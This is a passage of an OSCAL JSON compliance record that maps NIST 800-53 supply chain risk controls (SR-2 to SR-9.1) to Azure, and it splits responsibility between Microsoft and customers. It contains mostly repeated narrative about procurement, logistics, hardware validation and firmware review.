The document has a revision history table indicating when it was last updated."}],"responsibilities":[{"uuid":"592d4f08-28b3-4576-a471-e12de9e4ad36","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-007"}],"description":"The customer is responsible for reviewing and updating the supply chain risk management plan associated with customer-deployed resources at a customer-defined frequency.","provided-uuid":"7b739223-fd6f-4252-8c3e-e8c6debf9cd7"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"cd888f9b-4f53-464b-81dc-8cd2f2b9e142","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-008"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sr-2_smt.c","by-components":[{"uuid":"8e64cfae-a866-4749-9f7b-a48b743395d4","export":{"provided":[{"uuid":"5db11a6d-15db-4928-86ba-5f46811a6347","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-008"}],"description":"The Azure Supply Chain team leverages a protected and access-controlled website to house the supply chain risk management plan. 
Role-based access control is enforced: only personnel whose job responsibilities require it have access to the website, and all other personnel do not."}],"responsibilities":[{"uuid":"9c2e0cfc-c5b6-4ec9-8601-0ec1cfb31a59","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-008"}],"description":"The customer is responsible for protecting the supply chain risk management plan for customer-deployed resources from unauthorized disclosure and modification.","provided-uuid":"5db11a6d-15db-4928-86ba-5f46811a6347"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"d1ede367-d2db-40e5-9b5c-9a02e7b476ea","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"sr-2.1","statements":[{"uuid":"8a75283d-eba2-4d86-b48d-c13f2c83473c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-009"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sr-2.1_smt","by-components":[{"uuid":"8157f227-a9fa-4d80-ae98-655550d98918","export":{"provided":[{"uuid":"44f0c27e-2508-4f08-a238-3140871f689a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-009"}],"description":"As part of the Microsoft Supply Chain Security Program, Azure deploys a team responsible for leading and supporting supply chain risk management activities. 
The team members are introduced to industry-leading supply chain quality programs to support Azure cloud environments."}],"responsibilities":[{"uuid":"0e144899-03cc-4aa0-ab01-5cbdae7d833d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-009"}],"description":"The customer is responsible for establishing a supply chain risk management team to support supply chain risk management activities for customer-deployed resources.","provided-uuid":"44f0c27e-2508-4f08-a238-3140871f689a"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"33338d33-e324-4dbc-becc-4405d8c80821","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"sr-3","statements":[{"uuid":"f6d6059f-6716-4cef-8388-8fab62b06ea9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-010"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sr-3_smt.a","by-components":[{"uuid":"71948cae-cc95-4e7d-aaa7-91af77be4164","export":{"provided":[{"uuid":"2b55cc08-70da-4c49-9287-ebb4289853f5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-010"}],"description":"Azure has established a process to identify and address weaknesses or deficiencies in supply chain elements supporting Azure cloud environments, as described below. \"One Microsoft\" Supply Chain assurance efforts consist of numerous capabilities executing a corporate strategy that contributes to protecting Azure. 
\n\nProcurement\nDuring the initial supply chain phase, the Procurement team protects against supply chain threats by facilitating the creation of the purchase order to our suppliers, ensuring consistency in approach. <https://www.microsoft.com/en-us/procurement/supplier-contracting.aspx>\n\nCustomer Operations\nCustomer Operations performs routine business reviews with our suppliers, representing the needs and concerns of all Azure business groups. This team also supports Azure business groups on standards definition and service capability. A key function of this team is to protect against any threats posed by suppliers during manufacturing by ensuring adherence to standard supply chain methodologies and processes.\n\nDeployment Quality\nAt system integration, or upon delivery of systems to our Azure datacenters for deployment, Deployment Quality works to ensure that final delivery of the system to the Azure business group is on time and free of defects. Working in conjunction with Supply Chain Automation, these capabilities monitor performance metrics, capture business group feedback, and lead cross-functional Supply Chain.\n\nSupplier Relationship Management (SRM)\nAs services move into the operations and maintenance phase of the life cycle, SRM protects Azure by managing and facilitating the supplier complaint process to drive root cause analysis and corrective action within the suppliers' supply chain. Supplier scorecards allow Azure to compare and visibly monitor the performance of our supply base using a balanced scorecard approach.\n\nSpares\nSpares Management protects against supply chain threats by managing the determination and execution of obtaining spare components to support deployed devices within our Azure datacenters. Parts are spared to significantly reduce downtime of production equipment during a troubleshooting scenario, helping to ensure site uptime for our business. 
To ensure security of the supply chain and protection against threats, Azure uses well-established suppliers with a proven track record in secure supply chain management. In addition, these suppliers have established Service Level Agreements with critical providers to ensure that additional spare parts and maintenance activities are provided in a timely manner.\n\nBusiness Continuity\nMicrosoft manages a comprehensive Continuity of Supply program with redundancies across systems integrators and component suppliers wherever possible. A dedicated team drives continuous analysis of multi-source versus single-source components and end-of-life transitions across the Bill of Materials. Strategic purchases and inventories are held in an ongoing program to ensure supply of critical components and last-time purchases. Supplier financial health is assessed routinely, with risk assessments and deeper engagement on areas of concern. Asset Classification and Risk Assessments are determined by a \"One Microsoft\" team at initial infrastructure design and build to meet market/customer compliance boundary requirements. In addition, processes exist for each service to provide its offering in each boundary, and processes are in place for designated high integrity devices and services.\n\nLogistics\nMicrosoft continues to increase assurance in the complex global cloud supply chain by implementing a new global control tower capability that provides the next generation of supply chain visibility. The capability delivers proactive intelligence on potential disruptions, including weather, traffic, and global events, which allows Microsoft to notify customers as disruptions occur so that deliveries can be adjusted and completed successfully. In addition, Microsoft is placing sensors with GPS capability, supported by light and temperature detection, on high value shipments at fifteen (15) minute tracking intervals. 
\n\nValidation\nMicrosoft employs a capability to discover, configure, and validate in-rack hardware. The validation is executed at the original equipment manufacturer (OEM) prior to shipment and again at the Microsoft datacenter.\n\nFirmware\nMicrosoft employs firmware source code guidance, reviews, and penetration tests to identify security vulnerabilities at the firmware level.\n\nGlobal Security Ecosystem Support\nCapabilities including Threat Intelligence, the Digital Crime Unit, the Cyber Defense Operations Center, the Service Security Teams, and the Azure Red Team coordinate overt and covert activities to validate and strengthen the global Azure and specific sovereign infrastructures. In addition, Third Party Assessment Organization (3PAO) penetration tests are part of the overall certifications.\n\nIndustry Leadership\nThe Microsoft Supply Chain Security program has maintained industry-leading low loss levels across the various supply chains for the past five (5) years. Microsoft is Tier 3 certified with the Customs Trade Partnership Against Terrorism (CTPAT), a Homeland Security / Customs and Border Protection program, and Authorized Economic Operator (AEO) certified in India, with Australia pending.\n\nGlobal Leadership and Partnerships\nMicrosoft members maintain leadership roles in the Transported Asset Protection Association (TAPA) and the Alliance for Gray Market and Counterfeit Abatement (AGMA). 
In addition, Microsoft maintains active representation in the European Union, North Atlantic Treaty Organization, and World Trade Organization."}],"responsibilities":[{"uuid":"e7a6cb3e-181d-4243-8f54-39033bdeb768","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-010"}],"description":"The customer is responsible for establishing processes to identify and address weaknesses or deficiencies in the supply chain elements and processes of customer-deployed resources, in coordination with customer-defined supply chain personnel.","provided-uuid":"2b55cc08-70da-4c49-9287-ebb4289853f5"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"8fc07cb6-6f06-4b1b-b8be-21dcf170f0a7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-011"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sr-3_smt.b","by-components":[{"uuid":"68c010ef-2bdf-4468-b2f6-312f62d628c5","export":{"provided":[{"uuid":"3237cd67-7077-4099-8c91-dcf6b0f31f40","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-011"}],"description":"Azure has deployed the supply chain controls described in SR-3 part a above. 
The controls are designed to protect against supply chain risks to Azure cloud environments and to limit harm or consequences from supply chain related events."}],"responsibilities":[{"uuid":"53d11707-cb63-42fe-a778-f26494919918","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-011"}],"description":"The customer is responsible for employing controls to protect against supply chain risk to the system, system component, or system service and to limit harm or consequences from supply chain-related events for customer-deployed resources.","provided-uuid":"3237cd67-7077-4099-8c91-dcf6b0f31f40"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"15441fb0-c926-400e-a46f-a93d5e7f70ec","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-012"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sr-3_smt.c","by-components":[{"uuid":"e3991a30-5212-4325-89af-c5045f6af7da","export":{"provided":[{"uuid":"f710d37b-759b-4ecd-99f7-44a7ec7b215c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-012"}],"description":"Azure has documented the supply chain processes and controls described in SR-3 control above as part of Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP), and Supply Chain Risk Management Plan documents."}],"responsibilities":[{"uuid":"db7fa581-f692-4cd3-973f-0577eba9bff4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-012"}],"description":"The customer is responsible for documenting the selected and implemented supply chain processes and controls 
in security, privacy, or supply chain management plan document for customer-deployed resources.","provided-uuid":"f710d37b-759b-4ecd-99f7-44a7ec7b215c"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"28684fca-88e6-4157-bfb6-4883c38376a4","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"sr-5","statements":[{"uuid":"b3538304-64a0-4649-80da-f6c75ac9298c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-013"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sr-5_smt","by-components":[{"uuid":"5b06e77b-eb55-4f52-9a86-35721cdd3fdf","export":{"provided":[{"uuid":"6c57b4ee-fc13-43af-a6bf-0d241b215788","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-013"}],"description":"Azure has established the following supply chain acquisition strategies, contract tools, and procurement methods to support Azure cloud environments. \"One Microsoft\" Supply Chain assurance efforts consist of numerous capabilities executing a corporate strategy that contributes to protecting Azure. Procurement During the initial supply chain phase, the Procurement team protects against supply chain threats by facilitating the creation of the purchase order to our suppliers ensuring consistency in approach. 
<https://www.microsoft.com/en-us/procurement/supplier-contracting.aspx> Customer Operations Customer Operations performs routine business reviews with our suppliers representing the needs and concerns of all Azure business groups. This team also works to support Azure business groups on standards definition and service capability. A key function of this team is to protect against any threats posed by suppliers during manufacturing by ensuring adherence to standard supply chain methodologies and process adherence. Deployment Quality System integration or upon delivery of services to our Azure datacenters for deployment; Deployment Quality works to ensure final delivery of the system to the Azure business group is done on-time and free of defects. Working in conjunction with the Supply Chain Automation, these capabilities monitor performance metrics, capture business group feedback, and lead cross-functional Supply Chain. Supplier Relationship Management (SRM) As services move into the operations and maintenance phase of the life cycle, SRM protects Azure by managing and facilitating the supplier complaint process to drive root cause and corrective action within the suppliers' supply chain. Supplier scorecards allow Azure to compare and visibly monitor the performance of our supply base utilizing a balanced scorecard approach. Spares Spares Management protects against supply chain threats by managing the determination and execution of obtaining spare components to support deployed devices within our Azure datacenters. Parts are spared to significantly reduce downtime of production equipment during a trouble-shooting scenario, helping to ensure site uptime for our business. To ensure security of the supply chain and protection against threats, Azure uses well-established suppliers with a proven track record to secure supply chain management. 
In addition, these suppliers have established Service Level Agreements with critical providers to ensure that additional spare parts and maintenance activities are performed in a timely manner. Business Continuity Microsoft manages a comprehensive Continuity of Supply program with redundancies across Systems Integrators and components suppliers wherever possible. There is a team which drives continuous analysis of multi-source vs single source and end of life transitions for components across the Bill of Materials. Strategic purchases and inventories are held in an ongoing program to ensure supply of critical components and last time purchases. Supplier financial health is assessed routinely with risk assessments and deeper engagements on areas of concern. Asset Classification and Risk Assessments are determined by a \"One Microsoft\" team at initial infrastructure design and build to meet market/customer compliance boundary requirements. In addition, there are existing process for each service to provide its offering in each boundary. In addition, processes are in place for designated high integrity devices and services. Logistics Microsoft continues to increase assurance in the complex cloud global supply chain with next generation visibility by implementing a new global control tower capability, the next generation of supply chain visibility. The new capability delivers proactive intelligence on potential disruptions including weather, traffic, and global events, that allows Microsoft to notify our customer as the disruptions occur to adjust and deliver successfully. In addition, Microsoft is placing sensors on high value shipments with GPS capability supported by light and temperature detections at fifteen (15) minute tracking intervals. Validation Microsoft employs a capability to discover, configure, and validate in-rack hardware. The validation is executed at the original equipment manufacturer (OEM) prior to shipment and again at the Microsoft datacenter. 
Firmware Microsoft employs firmware source code guidance, reviews, and penetration tests to identify security vulnerabilities at the firmware level. Global Security Ecosystem Support Capabilities including Threat Intelligence, Digital Crime Unit, Cyber Defense Operations Center, and Service Security Teams, the Azure Red Team coordinated overt and covert activities to validate and strengthen the Global Azure and Specific Sovereign Infrastructures. In addition, the Third Party Assessment Organization (3PAO) penetration tests are part of the overall certifications. Industry Leadership The Microsoft Supply Chain Security program maintains industry-leading low loss levels across the various supply chains for the past five (5) years. Microsoft is Tier 3 certified with Customs Trade Partnership Against Terrorism (CTPAT), a Homeland Security / Customs and Border Protection program, and Authorized Economic Operator (AEO) certified in India, pending Australia. Global Leadership and Partnerships Microsoft members maintain leadership roles in the Transported Asset Protection Association (TAPA) and the Alliance for Gray Market and Counterfeit Abatement (AGMA). In addition, Microsoft maintains active representation in the European Union, North Atlantic Treaty Organization, and World Trade Organization."}],"responsibilities":[{"uuid":"13439a0e-dfe0-4325-b435-345cd7e4f6e5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-013"}],"description":"The customer is responsible for employing acquisition strategies, contract tools, and procurement methods for customer-deployed resources to protect against supply chain risks. 
The customer is responsible for employing organization-defined tailored acquisition strategies, contract tools, and procurement methods for the purchase of the information system, system component, or information system service from suppliers.","provided-uuid":"6c57b4ee-fc13-43af-a6bf-0d241b215788"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"2fa866ba-5f00-4003-82c9-e003c8cc8a94","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"sr-6","statements":[{"uuid":"fc957fb4-1157-4d8b-8632-e60348bb2ec0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-014"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sr-6_smt","by-components":[{"uuid":"0eed6841-5392-430e-ba5f-72dad0f96806","export":{"provided":[{"uuid":"33cd77f2-b5bc-4d3e-8163-75e8dfed1d50","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-014"}],"description":"\"One Microsoft\" Supply Chain assurance efforts consist of numerous capabilities executing a corporate strategy that contributes to protecting Azure. The following efforts take place for Azure to assess and review the supply chain-related risks associated with supplier or contacts and Azure components they provide on an at least annual cadence. Procurement During the initial supply chain phase, the Procurement team protects against supply chain threats by facilitating the creation of the purchase order to our suppliers ensuring consistency in approach. 
<https://www.microsoft.com/en-us/procurement/supplier-contracting.aspx> Customer Operations Customer Operations performs routine business reviews with our suppliers representing the needs and concerns of all Azure business groups. This team also works to support Azure business groups on standards definition and service capability. A key function of this team is to protect against any threats posed by suppliers during manufacturing by ensuring adherence to standard supply chain methodologies and process adherence. Deployment Quality System integration or upon delivery of services to our Azure datacenters for deployment; Deployment Quality works to ensure final delivery of the system to the Azure business group is done on-time and free of defects. Working in conjunction with the Supply Chain Automation, these capabilities monitor performance metrics, capture business group feedback, and lead cross-functional Supply Chain. Supplier Relationship Management (SRM) As services move into the operations and maintenance phase of the life cycle, SRM protects Azure by managing and facilitating the supplier complaint process to drive root cause and corrective action within the suppliers' supply chain. Supplier scorecards allow Azure to compare and visibly monitor the performance of our supply base utilizing a balanced scorecard approach. Spares Spares Management protects against supply chain threats by managing the determination and execution of obtaining spare components to support deployed devices within our Azure datacenters. Parts are spared to significantly reduce downtime of production equipment during a trouble-shooting scenario, helping to ensure site uptime for our business. To ensure security of the supply chain and protection against threats, Azure uses well-established suppliers with a proven track record to secure supply chain management. 
In addition, these suppliers have established Service Level Agreements with critical providers to ensure that additional spare parts and maintenance activities are performed in a timely manner. Business Continuity Microsoft manages a comprehensive Continuity of Supply program with redundancies across Systems Integrators and components suppliers wherever possible. There is a team which drives continuous analysis of multi-source vs single source and end of life transitions for components across the Bill of Materials. Strategic purchases and inventories are held in an ongoing program to ensure supply of critical components and last time purchases. Supplier financial health is assessed routinely with risk assessments and deeper engagements on areas of concern. Asset Classification and Risk Assessments are determined by a \"One Microsoft\" team at initial infrastructure design and build to meet market/customer compliance boundary requirements. In addition, there are existing process for each service to provide its offering in each boundary. In addition, processes are in place for designated high integrity devices and services. Logistics Microsoft continues to increase assurance in the complex cloud global supply chain with next generation visibility by implementing a new global control tower capability, the next generation of supply chain visibility. The new capability delivers proactive intelligence on potential disruptions including weather, traffic, and global events, that allows Microsoft to notify our customer as the disruptions occur to adjust and deliver successfully. In addition, Microsoft is placing sensors on high value shipments with GPS capability supported by light and temperature detections at fifteen (15) minute tracking intervals. Validation Microsoft employs a capability to discover, configure, and validate in-rack hardware. The validation is executed at the original equipment manufacturer (OEM) prior to shipment and again at the Microsoft datacenter. 
Firmware Microsoft employs firmware source code guidance, reviews, and penetration tests to identify security vulnerabilities at the firmware level. Global Security Ecosystem Support Capabilities including Threat Intelligence, Digital Crime Unit, Cyber Defense Operations Center, and Service Security Teams, the Azure Red Team coordinated overt and covert activities to validate and strengthen the Global Azure and Specific Sovereign Infrastructures. In addition, the Third Party Assessment Organization (3PAO) penetration tests are part of the overall certifications. Industry Leadership The Microsoft Supply Chain Security program maintains industry-leading low loss levels across the various supply chains for the past five (5) years. Microsoft is Tier 3 certified with Customs Trade Partnership Against Terrorism (CTPAT), a Homeland Security / Customs and Border Protection program, and Authorized Economic Operator (AEO) certified in India, pending Australia. Global Leadership and Partnerships Microsoft members maintain leadership roles in the Transported Asset Protection Association (TAPA) and the Alliance for Gray Market and Counterfeit Abatement (AGMA). 
In addition, Microsoft maintains active representation in the European Union, North Atlantic Treaty Organization, and World Trade Organization."}],"responsibilities":[{"uuid":"a456156d-fe99-413b-a803-74ae94b5ba3a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-014"}],"description":"The customer is responsible for assessing and reviewing the supply chain related risks associated with suppliers or contractors and the system, system component, or system service they provide for customer-deployed resources at a defined frequency.","provided-uuid":"33cd77f2-b5bc-4d3e-8163-75e8dfed1d50"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"6a8150e1-cc30-44c6-ab04-dcf3b2b082d3","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"sr-8","statements":[{"uuid":"750f786e-7658-42df-83bc-c10aea90fae1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-015"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sr-8_smt","by-components":[{"uuid":"a1a24e1c-b349-4f01-826c-53231a7c26e5","export":{"provided":[{"uuid":"6a17c7ee-6f1c-454f-8cac-0455a01afded","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-015"}],"description":"As part of Microsoft Supply Chain Security Program, Azure deploys a team responsible for leading and supporting supply chain risk management activities. 
The team members are introduced to industry-leading supply chain quality programs to support Azure cloud environments. The team members have established agreements and procedures with various Azure partner teams of supply chain such as Azure Security, Azure Federal Compliance, and CELA teams for the notification of supply chain compromises and findings that are a result of assessments. If findings are identified, stakeholders of Azure cloud environments are notified through the approval of CELA on communication plans. Remediation plans for supply chain compromises or findings during assessments are formulated to track until implementation by team members who lead and support supply chain risk management activities."}],"responsibilities":[{"uuid":"bb4e842e-6429-404f-925b-e009ed673c77","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-015"}],"description":"The customer is responsible for establishing agreements and procedures with entities involved in the supply chain for customer-deployed resources to notify against supply chain compromise and results of assessments or audits for customer-defined information.","provided-uuid":"6a17c7ee-6f1c-454f-8cac-0455a01afded"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"75df5fec-3e67-407c-82d4-6550fc4152f1","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"sr-9","statements":[{"uuid":"71620cbd-3b79-4690-8243-21c9bb3c05e6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-016"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sr-9_smt","by-components":[{"uuid":"65ff1430-c9fa-4c9b-ae36-99423688d48b","export":{"provided":[{"uuid":"67e3b3c2-d01f-4ea6-9e34-83ff220b642c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-016"}],"description":"\"One Microsoft\" Supply Chain assurance efforts consist of numerous capabilities executing a corporate strategy that contributes to protecting Azure. The efforts described below are designed to ensure the enforcement of supply chain controls, including tamper protection for information system components supporting Azure cloud environments: Procurement During the initial supply chain phase, the Procurement team protects against supply chain threats by facilitating the creation of the purchase order to our suppliers ensuring consistency in approach. <https://www.microsoft.com/en-us/procurement/supplier-contracting.aspx> Customer Operations Customer Operations performs routine business reviews with our suppliers representing the needs and concerns of all Azure business groups. This team also works to support Azure business groups on standards definition and service capability. 
A key function of this team is to protect against any threats posed by suppliers during manufacturing by ensuring adherence to standard supply chain methodologies and process adherence. Deployment Quality System integration or upon delivery of services to our Azure datacenters for deployment; Deployment Quality works to ensure final delivery of the system to the Azure business group is done on-time and free of defects. Working in conjunction with the Supply Chain Automation, these capabilities monitor performance metrics, capture business group feedback, and lead cross-functional Supply Chain. Supplier Relationship Management (SRM) As services move into the operations and maintenance phase of the life cycle, SRM protects Azure by managing and facilitating the supplier complaint process to drive root cause and corrective action within the suppliers' supply chain. Supplier scorecards allow Azure to compare and visibly monitor the performance of our supply base utilizing a balanced scorecard approach. Spares Spares Management protects against supply chain threats by managing the determination and execution of obtaining spare components to support deployed devices within our Azure datacenters. Parts are spared to significantly reduce downtime of production equipment during a trouble-shooting scenario, helping to ensure site uptime for our business. To ensure security of the supply chain and protection against threats, Azure uses well-established suppliers with a proven track record to secure supply chain management. In addition, these suppliers have established Service Level Agreements with critical providers to ensure that additional spare parts and maintenance activities are performed in a timely manner. Business Continuity Microsoft manages a comprehensive Continuity of Supply program with redundancies across Systems Integrators and components suppliers wherever possible. 
There is a team which drives continuous analysis of multi-source vs single source and end of life transitions for components across the Bill of Materials. Strategic purchases and inventories are held in an ongoing program to ensure supply of critical components and last time purchases. Supplier financial health is assessed routinely with risk assessments and deeper engagements on areas of concern. Asset Classification and Risk Assessments are determined by a \"One Microsoft\" team at initial infrastructure design and build to meet market/customer compliance boundary requirements. In addition, there are existing process for each service to provide its offering in each boundary. In addition, processes are in place for designated high integrity devices and services. Logistics Microsoft continues to increase assurance in the complex cloud global supply chain with next generation visibility by implementing a new global control tower capability, the next generation of supply chain visibility. The new capability delivers proactive intelligence on potential disruptions including weather, traffic, and global events, that allows Microsoft to notify our customer as the disruptions occur to adjust and deliver successfully. In addition, Microsoft is placing sensors on high value shipments with GPS capability supported by light and temperature detections at fifteen (15) minute tracking intervals. Validation Microsoft employs a capability to discover, configure, and validate in-rack hardware. The validation is executed at the original equipment manufacturer (OEM) prior to shipment and again at the Microsoft datacenter. Firmware Microsoft employs firmware source code guidance, reviews, and penetration tests to identify security vulnerabilities at the firmware level. 
Global Security Ecosystem Support Capabilities including Threat Intelligence, Digital Crime Unit, Cyber Defense Operations Center, and Service Security Teams, the Azure Red Team coordinated overt and covert activities to validate and strengthen the Global Azure and Specific Sovereign Infrastructures. In addition, the Third Party Assessment Organization (3PAO) tests are part of the overall certifications. Industry Leadership The Microsoft Supply Chain Security program maintains industry-leading low loss levels across the various supply chains for the past five (5) years. Microsoft is Tier 3 certified with Customs Trade Partnership Against Terrorism (CTPAT), a Homeland Security / Customs and Border Protection program, and Authorized Economic Operator (AEO) certified in India, pending Australia. Global Leadership and Partnerships Microsoft members maintain leadership roles in the Transported Asset Protection Association (TAPA) and the Alliance for Gray Market and Counterfeit Abatement (AGMA). 
In addition, Microsoft maintains active representation in the European Union, North Atlantic Treaty Organization, and World Trade Organization."}],"responsibilities":[{"uuid":"b651b3a6-b998-4e3d-9ade-a7c7e63f47a7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-016"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for protecting customer-deployed resources against supply chain threats as part of a comprehensive, defense-in-breadth information security strategy.","provided-uuid":"67e3b3c2-d01f-4ea6-9e34-83ff220b642c"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"88a457ad-abd8-453b-ae36-e02af66346d8","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"sr-9.1","statements":[{"uuid":"1ab8381e-f662-4c40-a703-ff59ecda105f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-017"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sr-9.1_smt","by-components":[{"uuid":"d7510106-3506-4fdc-beb8-1d5d430a2659","export":{"provided":[{"uuid":"160dd627-ce9e-48fd-adc6-c938dcc9c214","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-017"}],"description":"\"One Microsoft\" Supply Chain assurance efforts consist of numerous capabilities executing a corporate strategy that contributes to protecting Azure. 
